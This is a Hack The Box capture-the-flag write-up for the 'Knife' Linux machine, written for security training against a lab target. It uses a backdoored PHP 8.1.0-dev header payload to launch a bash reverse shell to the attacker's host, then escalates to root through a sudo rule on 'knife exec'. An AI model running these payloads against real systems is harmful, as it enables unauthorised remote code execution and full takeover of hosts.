Knife
Hack The Box. Linux. Easy machine. This machine hosts a PHP website running a development build that shipped with a backdoor, and a sudo rule that lets the user we land as run knife as root. Recognising the backdoored PHP version and basic privilege escalation skills are needed to compromise this machine.
- OS: Linux
- Difficulty: Easy
- IP Address: 10.10.10.242
- Release: 22 / 05 / 2021
Port scanning
# Nmap 7.92 scan initiated as: nmap -sC -sV -oN nmap/targeted 10.10.10.242 -p 22,80
Nmap scan report for 10.10.10.242
Host is up (0.053s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done -- 1 IP address (1 host up) scanned in 10.72 seconds
This machine has ports 22 (SSH) and 80 (HTTP) open.
Enumeration
Browsing to http://10.10.10.242 shows the website whose title nmap reported (Emergent Medical Idea). The page content itself gives us nothing to work with, but the response headers do: the X-Powered-By header reveals PHP/8.1.0-dev:
$ curl 10.10.10.242 -I
HTTP/1.1 200 OK
Date:
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/8.1.0-dev
Content-Type: text/html; charset=UTF-8
The problem is that this development build was shipped with a backdoor: the PHP source had been tampered with so that any request carrying a User-Agentt header (note the double t) whose value starts with zerodium has the rest of that value evaluated as PHP code by the server. Sending the header User-Agentt: zerodiumsystem("whoami");
therefore executes the command whoami on the target
(more information here).
Foothold
Let's use the backdoor to get a reverse shell. The command is base64-encoded so that its quotes and redirections survive being placed inside the PHP string and the HTTP header, and the listener (nc -nlvp 4444) is started before the request is sent:
$ echo -n 'bash -i >& /dev/tcp/10.10.17.44/4444 0>&1' | base64
YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTcuNDQvNDQ0NCAwPiYx
$ curl 10.10.10.242 -H 'User-Agentt: zerodiumsystem("echo YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTcuNDQvNDQ0NCAwPiYx | base64 -d | bash");'
$ nc -nlvp 4444
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.242.
Ncat: Connection from 10.10.10.242:54378.
bash: cannot set terminal process group (950): Inappropriate ioctl for device
bash: no job control in this shell
james@knife:/$ script /dev/null -c bash
script /dev/null -c bash
Script started, file is /dev/null
james@knife:/$ ^Z
zsh: suspended ncat -nlvp 4444
$ stty raw -echo; fg
[1] + continued ncat -nlvp 4444
reset xterm
james@knife:/$ export TERM=xterm
james@knife:/$ export SHELL=bash
james@knife:/$ stty rows 50 columns 158
System enumeration
We enter the machine as james:
james@knife:/$ cd
james@knife:~$ cat user.txt
3c9359d46d35b73071095b9ef4e0dcf0
This user can execute knife as root without a password:
james@knife:~$ sudo -l
Matching Defaults entries for james on knife:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife
Privilege escalation
Reading knife's help output shows that knife exec runs arbitrary Ruby scripts, and since sudo runs knife as root without dropping privileges, a Ruby script can spawn /bin/bash as root. We can also check GTFOBins or use my tool gtfobins-cli:
$ gtfobins-cli --sudo knife
knife ==> https://gtfobins.github.io/gtfobins/knife/
Sudo
If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
sudo knife exec -E 'exec "/bin/sh"'
james@knife:~$ sudo knife exec -E 'exec "/bin/bash"'
root@knife:/home/james# cd
root@knife:~# cat root.txt
b631aac1a84b2e5cf9063d641735eb59